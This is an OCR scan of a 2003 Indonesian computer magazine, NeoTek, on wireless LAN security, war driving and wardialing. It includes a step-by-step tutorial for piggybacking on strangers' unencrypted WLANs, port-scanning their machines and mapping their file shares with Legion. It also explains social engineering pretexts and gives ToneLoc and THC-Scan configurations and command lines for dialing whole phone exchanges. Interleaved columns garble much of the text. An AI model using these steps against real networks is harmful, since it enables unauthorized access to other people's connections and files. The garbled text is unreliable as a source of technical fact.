router. Setelah AP dikenali dan dri- AP’s name berupa MAC Address address (default 192.168.2.50) dan
ver terpasang, kini instal AP Utility dan AP name (default MiniAP). default gateway (default
dari CD yang sama. Setelah instal- Ketikkan login password (default) 192.168.2.1). Dua yang terakhir
asi akan terlihat pada Start Menu: dan klik LOGIN. diubah agar sesuai dengan setting
EZ Connect Wireless AP Utility IP pada SMC Barricade Router.

SECURITY SECURITY SETTING FIRMWARE DAN WEB SETUP


4 Klik SECURITY dan terlihat bah-
wa security status DISABLED juga
5 Kenali MAC address dari setiap
komputer anda dan input ke
6 Tombol ABOUT menginformasikan
firmware version yang digunakan.
MAC access control table masih MAC access table. Dengan cara Firmware akan di-update secara
kosong. Klik SETUP dan akan ini komputer asing tidak mungkin berkala dari situs SMC. Selanjutnya,
tampil window untuk men-setup mengakses AP anda. Untuk setup AP dapat dilakukan dari
MAC address komputer yang mengamankan data dari sniffer, komputer mana saja dalam network
boleh mengakses AP ini serta aktifkan WEP encryption. Ada dengan web browser dengan me-
setup WEP encryption. dua pilihan: 64 bit atau 128 bit. ngetikkan IP address AP ini.

Mei/Jun 2003 NeoTek 9


NeoStart

WI RE LESS HAC KI NG
IRELESS LAN BUKAN HANYA RAWAN
W terhadap orang yang ikut memanfa-
atkan bandwidth (‘nyantol’), melain-
kan juga bahaya terhadap integritas kompu-

M U DAH NYA ‘NYANTOL’ ter yang ada didalam jaringan itu sendiri.
Sekali komputer asing masuk ke WLAN,
maka komputer asing itu sudah menjadi

WLAN ORANG bagian dari internal network. Walaupun


komputer-komputer dalam network meng-
gunakan router untuk membentuk NAT
firewall ke Internet, komputer asing justru
Untuk ‘nyantol’ WLAN orang, cukup menggunakan komputer sudah masuk dibalik NAT sebagai salah
yang sudah terpasang WNIC serta Network Stumbler, satu anggota keluarga (liar) dalam jaringan
tersebut.
program untuk war driving. Sekali sudah masuk ke network
Hal ini diperparah lagi bila jaringan itu
orang melalui access point-nya, maka hacking tool seperti mengaktifkan network neighborhood
IP scanner dan SMB scanner semakin mudah digunakan. untuk sharing files!

Menunjukkan betapa WLAN membuat hacking menjadi semakin mudah saja...

INFO DARI NETWORK STUMBLER SELECT NETWORK PENGAMATAN SINYAL


4 Pilih tab AP Names dan terlihat
bahwa network yang dikenali ha-
5 Kembali ke tab Selection dan
klik pada salah satu network
6 Anda bisa mengamati bahwa net-
work ini beroperasi pada channel
nyalah MiniAP milik sendiri. Agar yang berlabel Other untuk 10 serta kekuatan sinyal dan noise,
kedua network lain dikenali, ketik- melakukan pengamatan serta SNR (signal to noise ratio-
kan MAC address dan AP name- terhadap network ini. nya).
nya berdasarkan informasi MAC
dan SSID dari Network Stumbler.
Klik tombol Add to Table.

GRAPHICAL SIGNAL/NOISE JALANKAN WINIPCFG RELEASE DAN RENEW


10 Dengan Network Stumbler kita
juga dapat menampilkan grafik
11 Pilih Start > Run, ketikkan winipcfg
yang akan menampilkan konfigu-
12 Konfigurasi ini tidak cocok dengan
konfigurasi network yang baru kita
yang menunjukkan perbanding- rasi IP address. Terlihat bahwa akses. Klik tombol Release untuk
an sinyal dengan noise. Walau- komputer kita masih mengguna- mengosongkan konfigurasi dan
pun network ini telah teramati, kan konfigurasi IP address untuk selanjutnya Renew untuk mengisi
kita belumlah mengakses net- network internal sebelumnya konfigurasi baru. Kita mendapat IP
work ini. Cara mengaksesnya pada 192.168.123.160 dan default baru (192.168.0.6) dengan default
sangatlah mudah. gateway 192.168.123.254 gateway 192.168.0.1. Diduga net-
work ini menggunakan Microsoft ICS.

10 NeoTek Mei/Jun 2003


NeoStart

AKTIFKAN NETWORK STUMBLER PERIKSA SITE MONITOR TAB SELECTION


1 Komputer contoh mengakses WLAN
milik NeoTek seperti terlihat pada
2 Pada Avaya Wireless Client
Manager pilih Advanced > Site
3 Pindah ke tab Selection, klik Scan
Now dan terlihat bahwa sebenar-
Avaya Wireless Client Manager. Monitor, terlihat pada tab Site nya WNIC kita mengenali dua lagi
Jalankan Network Stumber dan Monitor bahwa AP yang dapat network selain WLAN dan diberi
terlihat selain SSID WLAN milik diakses hanyalah MiniAP yang label Other. Masing-masing tipe
NeoTek (channel 3), terdapat dua artinya AP milik NeoTek sendiri. Infrastructure (AP atau Residential
lagi access point. Semuanya tanpa Gateway) dan teramati beroperasi
mengaktifkan enkripsi! pada channel 6 dan 10.

MENGAKSES NETWORK EDIT PROFILE INFO LAIN NET STUMBLER


7 Untuk dapat mengakses network
tadi pada Avaya Wireless Client
8 Klik tombol Edit Profile yang akan
menampilkan window Edit Con-
9 Setelah terhubung ke network ini
informasi lebih jauh akan diper-
Manager pilih Actions > Add/Edit figuration (nama profil). Isikan oleh. Terlihat bahwa network ini
Configuration Profile yang akan Network Name dengan Wireless beroperasi pada channel 1, 4, dan
menampilkan window Add/Edit saja, sesuai dengan yang teramati 10 (bukan hanya 10 seperti yang
Configuration Profile. Buat oleh Network Stumbler. Selanjut- teramati sebelumnya), menggu-
profile baru (namakan Wireless) nya gunakan profil ini dan kita nakan AP merk Netgear dan ber-
dengan tipe Access Point. terhubung pada network ini. bagai informasi lainnya.

‘NYANTOL’ BERHASIL BAHAYA LANJUTAN AKSES KE FILE/HARD DISK


13 Jalankan aplikasi Internet apa
saja dan anda dapat mengakses
14 Komputer kita sudah menjadi
salah satu anggota (liar) dari
15 Dapat juga menjalankan Legion
atau SMB scanner lain untuk meng-
Internet lewat account orang lain. network mereka. Jalankan akses shares yang tersedia. Disini
Periksa lewat web browser ber- Superscan untuk men-scan net- dengan Legion kita melakukan
apa kecepatan akses yang dapat work ini. Terlihat adanya port mapping terhadap salah satu share
diperoleh. Diduga menggunakan 139 yang terbuka yang berarti menjadi suatu drive di komputer
ADSL 512K. aktifnya network neighborhood kita sehingga dapat mengamati
pada sistem Windows. isinya lebih lanjut. Sampai disini
kegiatan harap dihentikan!

Mei/Jun 2003 NeoTek 11


NeoStart

WI R E LE SS HAC K I N G
Memahami WLAN Security
Artikel ini diangkat dari bahan-bahan yang didapat dari S.C. Leung CISSP CISA CBCP
(scleung@pisa.org.hk) yang juga ketua dari PISA (Professional Information Security Association)
suatu organisasi non-profit berbasis di Hong Kong yang memanfaatkan keahlian dan pengetahuan
untuk membawa kemakmuran kepada masyarakat di abad informasi. NeoTek bertemu dengan
S.C. Leung sewaktu Security Conference Summit di Singapore.

W
IRELESS LAN MERUPAKAN TEKNOLOGI YANG
saat ini paling cepat perkembangan mau-
pun penerapannya. Akibatnya terjadi
kesenjangan antara cepatnya penerapan dengan
kemajuan pengamanan (security).
Pada dasarnya WLAN tidak mempunyai perlin-
dungan fisik dibandingkan halnya wired LAN.
Kita bandingkan wired LAN dengan wireless
LAN sebagai berikut.
Untuk dapat mengakses suatu LAN, anda harus
menghubungkan komputer anda yang telah di-
pasangkan NIC ke wired network tersebut dengan
kabel, namun pada WLAN ‘kabel’ itu tidak ada • War driving dilakukan oleh PISA pada bulan Juli 2002 dengan mengendarai trem
atau dipancarkan kemana-mana dan setiap kom- dari Kennedy Town ke Causeway Bay selama 2 jam, menggunakan perlengkapan
puter dengan wireless NIC dapat terhubung ke standar dan software gratis. Hanya melakukan discovery.
wireless LAN. Tidak melakukan koneksi ke AP (association).

Siapa saja dapat terhubung ke suatu wireless LAN melalui terhadap AP tertentu. Pada war chalking, AP yang termonitor
access point-nya, menjadi anggota (liar) dari network terse- ditandai (dari sini muncul istilah chalking) apakah merupakan
but, yang dengan demikian tidak ada gunanya network ter- open node, closed node, ataupun wep node.
sebut dilindungi dengan NAT firewall, sebab siapa saja bisa War chalking dengan demikian dapat digunakan untuk ma-
langsung masuk ke balik NAT firewall. suk ke network (dengan tujuan baik maupun buruk) selain
Selain kelemahan tidak adanya perlindungan fisik yang in- untuk ‘nyantol’ koneksi Internet
heren pada koneksi wireless, kelemahan lain adalah banyak- Komunitas war chalking dapat dihubungi lewat situs web-
nya wireless LAN yang dipasang dengan default configura- nya: http://www.warchalking.org/
tion, serta kelemahan inheren protokol 802.11b itu sendiri,
yang menjadi protokol untuk wireless LAN.
Tidak Adanya Perlindungan Fisik
Kurangnya Perhatian Terhadap Perlindungan WLAN Sinyal wireless LAN normalnya dapat ditangkap pada
kisaran sekitar 200 meter dari access point, tetapi client
Hasil war driving yang dilakukan oleh PISA di Hong Kong yang menggunakan antena eksternal dapat menangkap
pada bulan Juli 2002 menunjukkan bahwa sebagian besar sinyal sampai sejauh 1000 meter.
(77%) access point yang ditemukan (187 access point) ti-
dak mengaktifkan WEP encryption. Hasil war driving se- Apabila anda menempatkan AP dekat pintu atau jendela,
cara global juga menunjukkan kecenderungan yang sama. dapat dipastikan para tetangga dapat ikut menikmati akses
72% dari sekitar 25.000 access point yang ditemukan tidak Internet atau melakukan sniffing terhadap traffic network.
mengaktifkan enkripsi. Semua ini
rawan terhadap sniffer seperti
misalnya Ethereal
Lebih jauh lagi, 51% dari 187 AP
yang itu menggunakan default SSID.
Diketahuinya MAC address dan
SSID membuat setiap orang dapat
terhubung (associate) ke suatu
access point.
Apabila war driving hanya untuk ke-
pentingan statistik dan tidak men-
cari informasi lebih jauh terhadap
AP tertentu, maka pada war chalk-
ing, dicari karakteristik lebih jauh

12 NeoTek Mei/Jun 2003


NeoStart

Default Configuration
Banyak wireless LAN yang terpasang dengan default con-
figuration yang lemah dan rawan terhadap penyusup:
• WEP encryption tidak diaktifkan
Memang WEP encryption berlaku umum untuk semua
client dan dapat di-crack, tetapi paling tidak anda akan
terlindung dari casual hacker.
• SSID default dan di-broadcast
AP mempunyai default SSID, seperti Linksys (Linksys),
Tsunami (Cisco), WLAN (SMC), dan semua di-broadcast
• Akses admin mudah dilakukan
Admin name dan password default harus dihindari karena
AP dapat diakses lewat web, telnet, ataupun SNMP tanpa
difilter sama sekali. Bila AP ini mempunyai feature SNMP,
Apabila infrastruktur wireless LAN itu melibatkan koneksi maka jangan gunakan default community string atau
wireless antar-gedung tinggi, maka client yang tidak diingin- matikan sama sekali fungsi SNMP.
kan dapat melakukan sniffing dari bawah sejauh sampai • Tidak ada access control terhadap client
2.500 kaki (762 meter). Jadi walaupun sinyal wireless LAN Walaupun memang AP mempunyai fasilitas untuk mem-
para ISP yang dipasangkan di puncak-puncak gedung tinggi filter komputer dengan MAC address mana saja yang
dapat di-sniffing dari bawah (dikenal sebagai war flying). boleh mengakses suatu AP, dalam kenyataannya ini ha-
Tidak adanya perlindungan fisik ini pula yang membawa nya dapat dilakukan dalam sisitem skala kecil.
masalah bukan saja akses ilegal terhadap suatu access point,
melainkan juga munculnya access point-access point liar Kelemahan Inheren Protokol 802.11b
dengan berbagai tujuan. Risiko-risiko security di antaranya:
Wireless LAN masih berkembang dan sampai sekarang
• Pada network kantor misalnya, bisa saja seorang karyawan masih terdapat celah yang besar antara kebutuhan security
tanpa izin memasang access point-nya sendiri (rrogue AP) dengan apa yang terdapat pada protokol 802.11b.
demi keleluasaan pekerjaannya. Hal ini bisa menjadi ba-
haya bagi network perusahaan itu secara keseluruhan.
• Seseorang bisa mengaktifkan access point-nys sendiri di
tempat umum dan tampil seolah-olah sebagai access point
resmi dan menangkap network traffic pada akses WLAN
untuk umum (eevil twin).
• Untuk melakukan sniffing, suatu komputer tidak harus
terhubung (associated) dengan access point. Dengan de-
mikian untuk pemakai perorangan nyaris tidak mung-
kin mengetahui apakah network traffic-nya sedang di-
sniffing.
• Bukan itu saja, suatu laptop yang tidak terhubung ke
wireless network (tetapi WNIC-nya tetap terpasang),
• Network Stumbler secara otomatis menunjukkan network yang
dapat terkena serangan client-to-client. Ini dikarenakan
termonitor lengkap dengan MAC address, SSID, dan enkripsinya.
sifat WNIC yang dapat mengaktifkan ac-hoc peer-to-peer
network tanpa adanya access point. Koneksi ini dikenal Protokol 802.11b mempunyai banyak kelemahan:
sebagai IBSS (Independent Basic Service Set). Jadi walau- • Otentikasi yang Lemah
pun suatu perusahaan tidak memasang wireless LAN, Pada protokol 802.11b tidak terdapat user authentication
tetapi network-nya dapat diserang lewat salah satu kom- dan SSID di-broadcast dan dengan mudah dapat dike-
puter yang terhubung padanya dan kebetulan pada kom- tahui dengan menjalankan Network Stumbler. MAC
puter itu tanpa disadari masih terpasang WNIC. address selain dapat dimonitor juga dapat dipalsukan
• Tidak adanya perlindungan fisik pula yang membuat (spoofed), tidak adanya mutual authentication yang
wireless network mudah terganggu oleh peralatan memungkinkan munculnya AP palsu.
rumah tangga biasa seperti microwave oven, cordless • WEP bersifat statik (sama untuk semua user)
phone, serta peralatan-peralatan yang menggunakan WEP dirancang hanya untuk melindungi network traffic
teknologi Bluetooth. Ini dikarenakan banyak peralatan dari pengintip (eavesdropping) yang dapat dengan mudah
yang menggunakan frekuensi 2,4GHz seperti halnya melihat network traffic dengan sniffer seperti Ethereal.
wireless network (peralatan dengan protokol 802.11b). Tetapi walaupun telah diproteksi dengan WEP, apabila
Untuk mengatasi kelemahan tidak adanya perlindungan fisik sniffer berhasil mengumpulkan data sampai sekitar 4 juta
ini, beberapa tindakan dapat dilakukan untuk meminimum- frame (pada network yang sibuk hanya memerlukan
kan risiko, di antaranya: waktu 5 jam untuk mendapatkan 4 juta frame), maka
• Jangan menempatkan AP dekat pintu atau jendela software seperti WEPCrack atau AirSnort dapat meng-
• Kurangi daya broadcast access point crack enkripsi 128 bit ini.
• Matikan AP bila tidak sedang dipakai • Message Integrity yang Lemah
• Untuk perusahaan: Jangan biarkan adanya rogue AP dan Paket data 802.11b hanya ditujukan untuk menangani
kalau menggunakan building antenna, gunakan directional error detection dengan menggunakan CRC32 linear
radiation dan setel sudut pancarannya.

Mei/Jun 2003 NeoTek 13


NeoStart

checksum yang rawan terhadap bit-flipping attack (ber- untuk dipakai untuk tool tertentu. AiroPeek NX, suatu wire-
akibat pada pengubahan pesan yang terkirim). Juga tidak less auditing tool misalnya, dapat berfungsi dengan WNIC
terdapat pengecekan terhadap message sequence maupun ORiNOCO, tetapi tidak dengan WNIC Avaya yang dikatakan
timestamp, yang membuat wireless LAN rawan terhadap identik (merupakan pecahan) dari Lucent.
replay attack. (berakibat pada indentity spoofing). Banyak juga tool lain yang hanya tersedia pada Linux dan in-
stalasinya tidak mudah bagi para pemula dalam Linux. Sebut
Peningkatan Security pada Protokol 802.11 saja misalnya Kismet (padanan Network Stumbler), WEPCrack
Dengan begitu banyaknya kelemahan pada wireless LAN dan AirSnort (keduanya WEP cracker). AirSnort memang
yang menggunakan protokol 802.11b, kini peningkatan dapat di-port ke Windows dengan meng-compile sendiri versi
security sedang dilakukan dengan pengembangan protokol Windows (pada Linux) dengan menyertakan GTK+ dan GIMP
802.11i yang diharapkan selesai pada akhir 2003 (baru spe- for Windows serta menggunakan beberapa library yang di-
sifikasinya, belum peralatannya). peroleh dari hasil instalasi AiroPeek NX demo.
Selain itu, sebagai subset dari 802.11b, WPA (W
Wi-Fi Pro-
tected Access) diusulkan oleh Wi-Fi Alliance yang akan me Penutup
nyediakan authentication framework TKIP yang akan Dengan demikian banyak kelemahan yang belum diatasi
memperkuat integritas WEP dengan adanya Message In- apakah anda tetap mempertimbangkan wireless LAN?
tegrity Code (MIC) untuk mencegah pemaluan paket data, Untuk pemakaian pribadi, security yang ada sekarang, ter-
IV sequencing yang baru untuk mencegah replay attack, utama WEP encryption sudah memadai untuk mengatasi
serta WEP re-keying yang berubah setiap 10.000 paket. serangan casual hacker. Adapun untuk perusahaan perlu
dipertimbangkan penempatan access point pada DMZ
Masalah Security yang Masih Harus Diselesaikan (demiliterized zone), sedangkan internal network (wired)
Semua perbaikan yang mengubah total hampir keseluruh- harus berada di tempat yang aman.
an konsep security pada protokol 802.11 ternyata belum Juga perlu dipertimbangkan metode keamanan dari pihak
mengatasi keseluruhan masalah security pada wireless LAN. ketiga baik yang generik seperti firewall, VPN, Remote
Salah satu masalah ini terletak pada layer 2 management Authentication Dial-In User Service (RADIUS), maupun
frame. Menurut spesifikasi 802.11 yang merupakan pengayaan terhadap WEP encryption
seperti TKIP (Temporal Key Integrity Protocol) dan AES
• Management frame tidak diotentikasi (Advanced Encryption Standard), dan SSL (Secure Socket
Management frame terdiri dari association (terhubung ke layer) serta implementasi IDS (Intrusion Detection
AP), disassociation (terputus dari AP), serta beacon (broad- System).
casting MAC address, SSD, dan time stamp secara periodik
oleh AP). Konsekuensinya tidak ada cara untuk membeda- Windows XP, misalnya selain wireless friendly, juga sudah
kan AP yang sesungguhnya dari AP palsu, serta penyerang lebih secure dari versi-versi Windows sebelumnya dengan
dapat melakukan deasosiasi terhadap klien sehingga sudah terintegrasinya AES.
terputus hubungannya dari AP.
• Management frame dikirim sebagai clear text.
Hal ini mengakibatkan mudahnya melakukan sniffing.
Kelemahan-kelemahan ini dimanfaatkan untuk mengem-
bangkan hacking tools terhadap wireless LAN, seperti AirJack
yang dikembangkan Abaddon (abaddon@802.11ninja.net)
dan diperkenalkan dalam BlackHat Briefings 2002.
AirJack adalah tool untuk melakukan disassociation DoS
attack terhadap WNIC card tipe Prism dan Hermes selain
fungsi-fungsi lain yang tidak kalah seramnya:
• WLAN-Jack: DoS terhadap WLAN
Dapat dijalankan secara broadcasted atau directed. Pada
directed mode, korban akan mengira kerusakan ada pada
WNIC-nya.
• ESSID-Jack: Mendapatkan SSID yang Disembunyikan
Mengirimkan de-authentication frame ke broadcast address
dan listen ke client probe request serta AP probe response.
• Monkey-Jack: Man-in-the-Middle Attack
Men-deauthenticate korban dari AP sebenarnya dengan
mengirimkan deauthenticate frame menggunakan MAC
address dari AP. Korban akan men-scan AP kembali.
Korban terasosiasi ke AP palsu (channel baru) pada mesin
penyerang. Akibatnya penyerang berhasil menyusup di
antara client dengan server.
• Kracker-Jack: Menyerang VPN yang Lemah
Berbagai tool untuk wireless hacking yang tersedia untuk sis-
tem operasi Windows bersifat sangat hardware specific, se-
hingga anda harus memperhatikan WNIC apa yang sesuai • Windows XP sudah menyediakan fitur IEEE892.1x Authentication
pada LAN Properties-nya

14 NeoTek Mei/Jun 2003


NeoStart

SCAN N I N G D IAL-U P M O D E M
Wardial untuk Mencari Mangsa
War driving mendapatkan namanya dari kegiatan tempo dulu yang dikenal sebagai Wardial.
Tambahan pengetahuan tetang mengetest security jaringan khususnya yang mengunakan
line telepon (dial-up) ini disajikan oleh Putut Indrayana (matrik7@yahoo.com)

ARDIALING ADALAH KEGIATAN SCANNING TERHADAP —dan tentu saja komputer) penyusup tinggal melakukan
W nomor-nomor telepon tertentu dengan menggu-
nakan komputer dan modem. Setiap nomer telepon
bruteforce terhadap login password yang diminta pada
komputer sasaran, untuk mendapatkan akses ke jaringan
yang terhubung ke modem akan menjawab dengan mo- komputer sasaran dan melakukan yang diinginkan.
dem handshake sehinga dapat terjalin koneksi. Wardial juga dapat untuk memacetkan jaringan telepon
Wardial sangat popular pada awal keberadaan Internet, ka- khususnya mesin fax, karena pada wardial kita dapat
rena pada masa itu koneksi internet lebih banyak terjalin memanggil nomer yang dituju berkali-kali (100–200 kali
melalui kabel telpon dan modem. Inilah kenapa pada masa cukuplah) karena fax mesin akan melakukan redial 2–5
lalu hacking merupakan kegiatan yang membutuhkan wak- kali untuk dapat terjalin hubungan dengan nomor pengi-
tu dan kesabara. Meskipun koneksi internet pada saat ini rim. Namun sayang pulsa telepon kalau sekedar untuk
telah tumbuh dengan berbagai macam cara, namun koneksi memacetkan jaringan telepon/fax mesin sasaran .
mengunakan jaringan telepon (dial-up) masih banyak
digunakan. Mendapatkan Nomor Telepon Target
Cara kerja wardial adalah dengan melakukan scaning ter- Penyusup dapat dengan mudah mendapatkan nomor telepon
hadap nomor-nomor telepon seperti halnya program port target. Cukup dengan menghubungi pusat informasi tel-
scanner. Sebuah host computer men-scan beberapa nomor kom, dari yellow pages, ataupun melakukan social engin-
telepon dalam range yang di tentukan dengan mengguna- eering. Kemungkinan terburuk buruk mungkin mengorek-
kan modem. Setiap nomor telepon yang menjawab dengan ngorek tong sampah (trashing) di perusahaan itu. Setelah
modem hanshake (carrier) akan menjalin hubungan de- mendapatkan nomor telepon target, penyusup tinggal
ngan host dan akan terekam dalam sebuah log file. melakukan wardialing ke nomer tersebut
Dari log inilah kita dapat mengetahui nomor-nomor tele- Beberapa software wardial terdapat pada CD NeoTek kali
pon mana yang terhubung ke Internet. Beberapa wardial ini. Di antaranya:
tool yang dengan dukungan modem tertentu dapat juga • ToneLoc
mendeteksi mesin fax, PBX, dan suara manusia Sangatlah
• THC-Scan
penting untuk melakukan wardialing dengan hardware
yang sesuai untuk dapat menghindari kegagalan atau • PhoneTag 13
error report. dan lainnya, tetapi yang dibahas khusus adalah dua war
dialer yang pertama, yang merupakan war dialer klasik
Setelah penyusup melakukan wardialing dan mendapatkan dan menjadi contoh bagi pengembangan war dialer lain.
nomor carrier (nomer telpon yang terhubung ke modem

Trashing langsung kepada orang tertentu untuk mendapatkan


Trashing adalah mencari data atau berkas tertentu dari per- informasi yang kita inginkan." Dan dalam teknik atau
usahaan dengan cara mengumpulkan berkas yang tidak di- pelaksanaannya seorang social engineer akan berbohong,
pakai atau yang telah dibuang untuk mendapatkan informasi menipu, mengintimidasi orang lain dengan berbagai cara
yang dicari. Meski kedengarannya seperti mengumpulkan untuk mendapatkan informasi yang diinginkan. Namun
sampah, tapi kita akan terkejut dengan sampah data yang kebanyakan social engineering dilakukan melalui telepon.
kita kumpulkan, karena kemungkinan besar akan didapat data Sebagai contoh:
berharga bagi kita yang bagi mereka tidak berarti apa-apa. Jika seorang hacker ingin menyusup ke jaringan komputer
Bruteforce sebuah perusahaan namun tidak bisa mendapatkan account
Bruteforce adalah cara lain dari dictionary attack atau me- dengan cara hacking biasa, maka dia mencoba menelpeon
mecahkan password dengan mencoba satu-persatu karakter perusahaan tersebut dan dengan sangat cerdik mengaku seba-
atau kata dengan bantuan kamus kata-kata (wordlist ). gai seseorang yang bertugas memperbaiki jaringan komputer
Cobalah membuat kamus kata sendiri dengan perusahaan tersebut dan mengujinya secara remote, namun
memperkirakan apa yang ada di pikiran dan lingkungan dia tidak diberi account ke jaringan, dan operator penerima
pembuat password. Dengan demikian nilai untuk keberha- telpon pun memberikannya agar semua orang bisa melanjut-
silannya lebih baik kan pekerjaannya masing-masing.
Kedengaranya sangat skeptik jika kita percaya kalau SE
Social Engineering (SE) seperti ini akan berhasil, namun di banyak kasus telah
Social engineering dapat dijelaskan dengan berbagai cara, terbukti berhasil, karena meskipun perusahaan tersebut
namun definisi saya tentang social engineering adalah: memiliki security yang ketat tapi kelemahan yang paling
"melakukan pendekatan secara langsung ataupun tidak besar terdapat pada pegawainya.

Mei/Jun 2003 NeoTek 15


NeoStart

WARDIALE R
EMANG SUDAH ADA WAR DIALER YANG
M dibuat untuk Windows, tetapi bia-
sanya sudah sekaligus juga remote
access program (misalnya Telix for Windows).

TONE LOC & THE HACKER’S Adapun war dialer sendiri pada umumnya
ditulis dengan DOS sebab memang pada
jaman ramai-ramainya war dialing, Internet

CHOICE THC-SCAN masih dijalankan dengan command line.


ToneLoc dan kemudian disempurnakan oleh
THC-Scan adalah war dialer dengan kemam-
puan besar dan relatif mudah digunakan.
War dialer dikelompokkan sebagai phreaking program,
Memang, bila anda sejak awal sudah terbiasa
yaitu program untuk meng-hack sistem telepon. Dalam dengan Windows, agak sedikit kikuk meng-
pengoperasiannya, war dialer dapat disetarakan dengan port gunakan program DOS. Yang penting, biasa-
kan dulu navigasi program dengan menggu-
scanner, hanya war dialer men-scan nomor-nomor telepon nakan panah kiri/kanan/atas/bawah dan
(exchange scanner). select/unselect menu dengan Enter/Esc.

ToneLoc adalah war dialer klasik yang menjadi favorit para hacker di jamannya

MEMBUAT FILE TL.CFG FILES MENU MODEMSTRING MENU


1 Sebelum menjalankan ToneLoc,
software perlu dikonfigurasi agar
2 Dari Files menu tetapkan nama-
nama file untuk Log, Carrier, Found.
3 Disini anda dapat meng-customize
AT command pada modem anda.
mengenali COM port, time delay, Pada file-file ini disimpan hasil dial, Anda dapat mengubah ATDT
dan tempat menyimpan hasil war- termasuk response (busy, timeout, menjadi misalnya ATDT 9,031 yang
dial. Pertama jalankan tlcfg.exe atau login prompt). Sebaiknya secara otomatis menggunakan
yang menampilkan menu bar nama file diatur sesuai prefiks prefiks line keluar (9) untuk dial ke
(pilih dengan panah kiri/kanan) telepon. Blacklist berisi nomor Surabaya (031). Umumnya tidak
dan Enter untuk dropdown menu. yang jangan di-dial seperti 108. ada yang perlu diubah di sini.

Untuk waktu dial 1 menit dan Wait Delay


setting 45 detik, maka diperlukan waktu 16
jam untuk men-dial 1000 nomor. Ada
baiknya mencoba mengurangi Wait Delay
sampai sekitar 35.000 (35 detik).
Untuk meng-capture data dari carrier yang
teramati, pastikan Save .DAT Files disetel Y.
Setelah ToneLoc selesai dikonfigurasi, save
file tlcfg.exe ini ke disk. Ada baiknya rename
file ini menjadi lebih deskriptif seperti misal-
nya 555-com1.cfg untuk memudahkan me-
ngenalinya di kemudian hari.
Untuk menjalankan ToneLoc, masuk pilih
Start > Run dan ketikkan command untuk
membuka command prompt. Ketikkan
C:\>toneloc.exe <enter> untuk melihat
MODEMOPTIONS MENU SCANOPTIONS MENU
4 Dari ModemOptions tetapkan set-
ting fisik modem, misalnya konek
5 Anda mungkin harus mengatur
Between-call Delay dan Wait
opsi-opsinya.
Perintah berikut akan men-save hasil ke file
ke port COM mana. Gunakan Delay Setting. Keduanya milidetik. 031555-.dat (sesuai exchange prefix) dengan
Control Panel > Phones and Kalau modem seperti hang, ting- menggunakan opsi konfigurasi yang telah
Modem Setting untuk mengeta- katkan Between-call Delay. Wait ditetapkan sebelumnya di file 555-com1.cfg
huinya. Biasanya cuma ini yang Delay sangat penting, yaitu waktu C:\>toneloc.exe 031555-.dat /C:555-com1.cfg
perlu di-set. ToneLoc hanya dapat bagi ToneLoc dalam menunggu
menggunakan satu buah COM port. jawaban.

16 NeoTek Mei/Jun 2003


NeoStart

Asalkan dasar-dasar navigasi itu sudah Pemanfaatan war dialer dapat ditingkat- berjalan pada mesin anda. Cara lain
dibiasakan, maka kediua program ini kan lagi dengan otomatisasi pengiriman coba jalankan software yang sudah jadi
akan terasa mudah digunakan, khusus- perintah ke modem dengan cara meng- (ada dalam thc-bin.zip) pada dua jenis
nya untuk mengkonfigurasi program ini. gunakan batch file yang sesuai. mesin yang memang bebeda kernelnya:
Setelah selesai konfigurasi, untuk men- Pembuatan batch file memerlukan sedi- • Windows 95/98/ME atau
jalankannya aktifkan jendela command kit konsep programming. Mungkin di • Windows NT/2K/XP
line (menjalankan command.com atau sini bagi pemakai yang terbiasa dengan Bermain war dialer dengan program ber-
cmd.exe), masuk ke direktori program Windows dan bukan programmer akan basis DOS memang bukan pekerjaan
war dialer, dan dari situ ketikkan perintah- mendapat sedikit kesulitan. yang terlalu nyaman. Tetapi begitulah
perintahnya. Khusus untuk THC-Scan (dan beberapa cara kerja hacker pada jamannya dan
Mengetikkan nama program dan tekan utilitasnya), kadang-kadang tidak dapat program-program ini masih relevan
<enter> akan menampilkan opsi-opsi- berjalan di versi-versi mesin tertentu dengan masa kini, mengingat masih
nya. Pelajari opsi-opsi itu (kalau perlu (tampil runtime error). banyak akses Internet dengan dial-up.
lihat manualnya). Misalnya: Apabila ini terjadi, gunakan source code Atau anda mau mencoba versi windows
C:\>ttoneloc.exe <enter>, atau Pascal yang disediakan dan coba jalan- saja? Coba Telix for Windows yang di-
C:\>tthc-scan.exe <enter> kan rercompile source code itu agar sediakan juga pada CD NeoTek kali ini.

Semua fitur yang ada pada ToneLoc ada pula di THC-Scan plus yang lain lagi

USER FRIENDLY MODEM CONFIG MODEM RESPONSES


1 Konfigurasi THC-Scan dengan men-
jalankan ts-cfg.exe. THC-Scan
2 Konfigurasi pertama, MODEM
CONFIG pada dasarnya hanya
3 Disini yang menarik. Anda dapat
menetapkan program eksternal
merupakan war dialer berbasis menetapkan untuk menggunakan apa yang dijalankan terhadap res-
DOS yang user friendly. Setiap opsi port COM nomor berapa. Yang lain pons modem tertentu. Anda bisa
pada layar konfigurasi dilengkapi tidak perlu diubah. tetapkan misalnya HyperTerminal
dengan penjelasan mengenai apa ataupun PC Anywhere. Progam ini
yang perlu dilakukan. perlu dispesifikasi dulu dalam
menu EXECUTE CONFIG.

KELENGKAPAN THC-SCAN C:\>thc-scan.exe @fileteks.txt


Zip file thc-ts20.zip berisi pengenalan dan THC-Scan mempunyai kemampuan meng-
manual singkat THC-Scan (Readme.doc) output command line yang diperlukan ke
serta beberapa file zip lain: masing-masing komputer pada modem
• ts-bin.zip binary files THC-Scan pool. Kemampuan distributed dialing ini
mencakup pula tools untuk menggunakan netscan.bat.
manipulasi .dat files
• ts-doc.zip manual lengkap Untuk itu sebelumnya perlu ditetapkan dulu
• ts-misc.zip intro dan netscan.bat untuk environment variable CLIENT untuk mene-
distributed dialing (dial tapkan client number dari komputer yang
menggunakan beberapa sedang dipakai. Untuk itu sebelumnya anda
komputer sekaligus)
• ts-src.zp source code THC-Scan; dapat harus mengedit variabel-variabel CLIENTS
recompile menggunakan (jamak) dan DEEP pada file netscan.bat.
Pascal compiler apabila ada THC-Scan segera di-launch setelah bat file
masalah menjalankannya di
komputer anda.
ini dijalankan, jadi pastikan bahwa path dan
file ts.cfg sudah benar.
MENJALANKAN THC-SCAN Contoh full exchange 031-555-0000 sampai
LOG DAN MISCELLANEOUS Semua command line option yang berlaku 031-555-9999 dipecah dial-nya ke tiga
4 Pada LOGFILES anda dapat mene-
tapkan berbagai macam log file
pada ToneLoc berlaku pula pada THC-Scan,
dengan pengecualian /C (alternate config-
komputer:
C:\>set CLIENT=1 && netscan.bat 031555
dengan berbagai karakteristik: uration file) dan /T (only report tones). C:\>thc-scan 1-031555 /M:031555 R:0-3333 /Q
